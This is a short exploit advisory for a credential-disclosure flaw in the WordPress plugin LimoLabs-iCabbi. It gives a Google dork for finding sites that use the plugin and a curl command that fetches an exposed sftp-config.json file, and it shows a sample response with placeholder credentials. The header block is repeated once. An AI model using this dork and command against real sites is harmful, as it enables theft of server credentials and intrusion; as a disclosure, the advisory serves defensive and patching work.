# Exploit Title: Wordpress Plugin LimoLabs-iCabbi Remote Password Disclosure
# Google Dork: inurl:"plugins/limolabs-icabbi"
# Date: 22/07/2018
# Exploit Author: Gabriel Lipski # Exploit Title: Wordpress Plugin LimoLabs-iCabbi Remote Password Disclosure
# Google Dork: inurl:"plugins/limolabs-icabbi"
# Date: 22/07/2018
# Exploit Author: Gabriel Lipski ( gabriel.lipski[AT]protonmail.com )

# Vendor Homepage: https://www.icabbi.com
# Tested on: Ubuntu 12.04.5 / Debian 9.4

* PoC:

$ curl http://<TARGET>/wp-content/plugins/limolabs-icabbi/sftp-config.json

* Response:

...

"host": "1.3.3.7",
"user": "foo",
"password": "bar",
"port": "22",

...